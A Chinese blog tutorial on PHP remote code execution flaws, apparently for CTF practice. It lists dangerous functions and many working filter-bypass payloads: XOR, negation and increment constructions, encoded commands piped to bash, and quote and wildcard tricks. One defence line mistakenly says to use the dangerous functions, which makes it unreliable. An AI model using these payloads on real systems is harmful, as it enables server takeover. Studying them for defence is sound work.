RCE漏洞详解及绕过总结(全面)

已于 2023-10-02 20:07:30 修改
阅读量1.4w 收藏 361
点赞数 83
分类专栏: Web漏洞篇 文章标签: 网络安全 web安全
于 2023-07-10 22:07:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73185293/article/details/131557169
版权
本文详细介绍了远程代码执行(RCE)漏洞,包括常见系统命令和代码执行函数,如`system()`和`eval()`,并列举了多种绕过过滤的方法,如管道符、空格替代和编码绕过。此外,文章强调了RCE漏洞的危害,如权限提升和服务器控制,并提出了过滤输入和避免使用危险函数等防护措施。
摘要由CSDN通过智能技术生成

作者永不落的梦想

作者主页传送

座右铭过去属于死神,未来属于自己

本文专栏Web漏洞篇

今日鸡汤只有承担起旅途风雨,最终才能守得住彩虹满天

目录

一、rce漏洞概述

二、常见RCE漏洞函数

1.系统命令执行函数

2.代码执行函数

二、RCE绕过

管道符

空格过滤

反斜杠\绕过

取反绕过

异或绕过

自增绕过

黑名单绕过

base和hex编码绕过

正则匹配绕过

引号绕过

cat替换命令

回溯绕过

无回显RCE

无参数RCE

无字母数字RCE

三、RCE漏洞危害

四、RCE漏洞防护

一、rce漏洞概述

        在Web应用开发中为了灵活性、简洁性等会让应用调用代码执行函数或系统命令执行函数处理,若应用对用户的输入过滤不严,容易产生远程代码执行漏洞或系统命令执行漏洞;

二、常见RCE漏洞函数

1.系统命令执行函数

system():能将字符串作为OS命令执行,且返回命令执行结果;

exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显);

shell_exec():能将字符串作为OS命令执行

passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;

popen():打开进程文件指针

proc_open():与popen()类似

pcntl_exec():在当前进程空间执行指定程序;

反引号``:反引号``内的字符串会被解析为OS命令;

2.代码执行函数

eval():将字符串作为php代码执行;

assert():将字符串作为php代码执行;

preg_replace():正则匹配替换字符串;

create_function():主要创建匿名函数;

call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数;

call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组;

可变函数:若变量后有括号,该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行;

二、RCE绕过

管道符

管道符实例描述
;A;B无论真假,A与B都执行
&A&B无论真假,A与B都执行
&&A&&BA为真时才执行B,否则只执行A
|A|B显示B的执行结果
||A||BA为假时才执行B,否则只执行A

空格过滤

以下可代替空格
<<>%20(即space)
%09(即tab)$IFS$9${IFS}
$IFS{cat,/flag}

反斜杠\绕过

//如cat、ls被过滤,使用\绕过
c\at /flag
l\s /

取反绕过

//取反传参
<?php

$a = "system";
$b = "cat /flag";

$c = urlencode(~$a);
$d = urlencode(~$b);

//输出得到取反传参内容
echo "?cmd=(~".$c.")(~".$d.");"
?>

异或绕过

# 异或构造Python脚本
valid = "1234567890!@$%^*(){}[];\'\",.<>/?-=_`~ "

answer = input('输入异或构造的字符串:')

tmp1, tmp2 = '', ''
for c in answer:
    for i in valid:
        for j in valid:
            if ord(i) ^ ord(j) == ord(c):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break

print(f'"{tmp1}"^"{tmp2}"')


//异或php脚本

<?php
$a='phpinfo';
for ($i = 0;$i <strlen($a);$i++)
    echo '%'.dechex(ord($a[$i])^0xff);
echo "^";
for ($j=0;$j<strlen($a);$j++)
    echo '%ff';
?>

//输出:%8f%97%8f%96%91%99%90^%ff%ff%ff%ff%ff%ff%ff

//简单例题,flag再phpinfo()中,需要执行php命令:phpinfo();

<?php
show_source(__FILE__);
$mess=$_POST['mess'];
if(preg_match("/[a-zA-Z]/",$mess)){
    die("invalid input!");
}
eval($mess);


//构造payload,字符串phpinfo异或结果为"0302181"^"@[@[_^^"

mess=$_="0302181"^"@[@[_^^";$_();

自增绕过

//自增payload,assert($_POST[_]),命令传入_

$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);&_=phpinfo();

黑名单绕过

//变量拼接,如flag被过滤
将:
cat /flag
替换为:
b=ag;cat /fl$b

//读取根目录
eval(var_dump(scandir('/'););
//读flag
eval(var_dump(file_get_contents($_POST['a'])););&a=/flag



//等效于打开ls目录下的文件
cat `ls`

//_被过滤,php8以下,变量名中的第一个非法字符[会被替换为下划线_
N[S.S等效于N_S.S
php需要接收e_v.a.l参数,给e[v.a.l传参即可

//php标签绕过
?><?= phpinfo(); ?>

base和hex编码绕过

//base64编码绕过,编码cat /flag,反引号、| bash、$()用于执行系统命令
`echo Y2F0IC9mbGFn | base64 -d`
echo Y2F0IC9mbGFn | base64 -d | bash
$(echo Y2F0IC9mbGFn | base64 -d)

//hex编码绕过,编码cat /flag,| bash用于执行系统命令
echo '636174202f666c6167' | xxd -r -p | bash

//shellcode编码
//十六进制编码

正则匹配绕过

//如flag被过滤
cat /f???
cat /fl*
cat /f[a-z]{3}

引号绕过

//如cat、ls被过滤
ca""t /flag
l's' /

cat替换命令

morelesscattac
headtailvivim
nlodsortuniq
tac与cat相反,按行反向输出
more按页显示,用于文件内容较多且不能滚动屏幕时查看文件
less与more类似
tail查看文件末几行
head查看文件首几行
nl在cat查看文件的基础上显示行号
od以二进制方式读文件,od -A d -c /flag转人可读字符
xxd以二进制方式读文件,同时有可读字符显示
sort排序文件
uniq报告或删除文件的重复行
file -f报错文件内容
grep过滤查找字符串,grep flag /flag

回溯绕过

//php正则的回溯次数大于1000000次时返回False
$a = 'hello world'+'h'*1000000
preg_match("/hello.*world/is",$a) == False

无回显RCE

//无回显RCE,如exce()函数,可将执行结果输出到文件再访问文件执行以下命令后访问1.txt即可
ls / | tee 1.txt
cat /flag | tee 2.txt
//eval()无输出
eval(print`c\at /flag`;)

无参数RCE

        利用getallheaders()、get_defined_vars()、session_id等;

无字母数字RCE

        异或、取反、自增、临时文件上传;

三、RCE漏洞危害

        ①继承Web服务器程序权限,去执行系统命令;

        ②继承Web服务器权限,读写文件;

        ③反弹shell;

        ④控制整个网站甚至是服务器;

四、RCE漏洞防护

        ①对用户的输入作严格的过滤,如白名单策略;

        ②尽量使用容易产生漏洞的危险函数;

        ③保证用户不用控制危险函数的传参;

永不落的梦想
关注
  • 83
    点赞
  • 361
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全RCE漏洞讲解、绕过方式及实例介绍
等风来
05-13 1143
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
RCE漏洞
qq_46430168的博客
07-04 805
一、管道符 1. Windows管道符 ping 127.0.0.1|whoami   | 直接执行后面的语句 ping 127.0.0.1||whoami   || 前面的语句执行出错则执行后面的语句 ping 127.0.0.1&whoami   & 前面的语句为假则执行后面的语句 ping 127.0.0.1&&whoami   
NSSCTF-Web题目23(RCE-空格绕过)
最新发布
weixin_54055099的博客
07-04 977
RCE-空格绕过、弱比较
pikachu~~~RCE
weixin_50339832的博客
06-06 367
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。 远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而...
web安全】——命令执行漏洞RCE详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
RCE漏洞总结绕过---代码执行篇
qq_46603839的博客
04-30 1946
eval():该函数把字符串当做php代码来计算,并且字符串必须是合法的php代码,要以分号结尾;assert():该函数会检查一个指定断言。断言是一个逻辑学词汇,主要用于程序员来进行假设判断。断言只有两种类型,字符串型或者布尔型,当断言为flse时返回字符串表达式。如果断言是字符串那么会当做php代码执行;preg_replace():/e模式 正则匹配替换字符串,7.0版本后/e已经移除了;
Window和Linux常用的管道符
weixin_43460822的博客
09-28 2140
Window系列支持的管道符如下所示。 " | ":直接执行后面的语句。例如:ping 127.0.0.1 | whoami。 “ || ”:如果前面执行的语句执行出错,则执行后面的语句,前面的语句只能为假。例如:ping 127.0.0.1 || whoami " & " :如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。例如: ping 127.0.0.1 &wh...
RCE漏洞绕过
h0ld1rs的博客
10-27 5893
文章目录花括号斜杠空格过滤一些命令分隔符黑名单绕过拼接绕过编码绕过单引号和双引号绕过利用Shell 特殊变量绕过linux中直接查看文件内容的工具文件构造 花括号 {} 在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令 {cat,flag} 斜杠 路径 / \是在正则等语法里面,表示后面跟的字符是正常字符,不需要转义。 也就意味着,我们可以在rce漏洞,过滤掉cat ls等命令时候,直接使用ca\t来实现绕过 空格过滤 < 、<>、%20(spac
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解
07-30
2. **无回显**:即使没有回显,攻击者也可以通过构造特殊的外部实体和协议,绕过过滤,达到目的。 3. **过滤绕过**:使用不同的编码方式(如UTF-8)、伪装协议等方法,规避过滤机制。 **五、XXE修复** 修复XXE漏洞...
PbootCms-3.04前台RCE挖掘过程1
08-03
通过对PbootCms-3.04版本中RCE漏洞的挖掘过程进行详细分析,可以看出开发者在设计模板引擎时对安全性的考虑不足,导致了远程代码执行漏洞的存在。攻击者可通过构造特定的payload绕过正则表达式的限制,最终实现任意...
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
此外,通过分析`App`类中的`run`函数和`routeCheck`函数,我们可以进一步理解攻击路径以及如何绕过某些安全检查。 #### 总结与建议 1. **保持更新**:定期检查并应用所有框架和依赖库的安全更新。 2. **最小权限...
FastAdmin_Upload:FastAdmin 前台文件上传RCE
04-06
《FastAdmin前台文件上传RCE详解及Python利用方法》 FastAdmin是一款基于ThinkPHP5框架开发的后台管理系统,因其简洁易用的界面和强大的功能深受开发者喜爱。然而,任何系统都可能存在安全漏洞,FastAdmin也不例外...
信息安全_Android反序列化漏洞分析.2.pptx
08-14
与CVE-2014-7911不同,该漏洞不直接导致代码执行,而是允许攻击者执行任意地址减一的操作,虽然不能直接控制PC,但结合其他技术如堆喷射(Heap Spray)、返回导向编程(ROP)等,依然可以绕过地址空间布局随机化...
RCE详解(远程命令/代码执行漏洞
键盘的起始页
07-13 1万+
1.RCE(remote command/code execute)概述 RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行 一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口 比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安
RCE绕过的简介以及常见的绕过方式(个人学习笔记)
2302_80935968的博客
03-28 1001
1.目录分隔符被过滤后,无法通过cat等查看目录的命令直接读取文件夹的目录里的PHP文件,而是需要先进入该文件夹(查看文件夹目录),再通过cat读取PHP文件的内容。进入题目,查看源代码,为php函数,该函数意思为:判断是否有变量cmd,如果有,则执行eval($_REQUEST[‘cmd’]);查看网页信息,该题对注入的命令无任何过滤,且当输入ip的时候,cmd会执行ping命令,尝试ping 127.0.0.1 | ls ,可以正常连接。命令 system():执行系统命令并输出执行结果。
RCE漏洞总结绕过---系统命令执行篇
qq_46603839的博客
04-23 2998
对于取反绕过~ 、参数逃逸等绕过方法放在了 代码执行漏洞篇中RCE漏洞防护1.对用户的输入作严格的过滤,建议使用白名单策略;2.尽量不使用容易产生漏洞的危险函数;
php RCE常用函数
08-26
PHP中常用的RCE(远程代码执行)函数包括preg_match、array_values、current和eval。其中,preg_match函数主要用于过滤函数,将一些常用不带参数的函数的关键部分过滤掉,需要使用其他方法来执行命令。 array_values函数可以将数组的值重新组成一个数组,配合current函数可以取出数组的第一个值,用于RCE。另外,chdir()函数返回的是布尔类型的true,对不需要传入参数的time()函数没有影响,可以正常执行。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [浅谈无参数RCE](https://blog.csdn.net/weixin_30568317/article/details/116284685)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值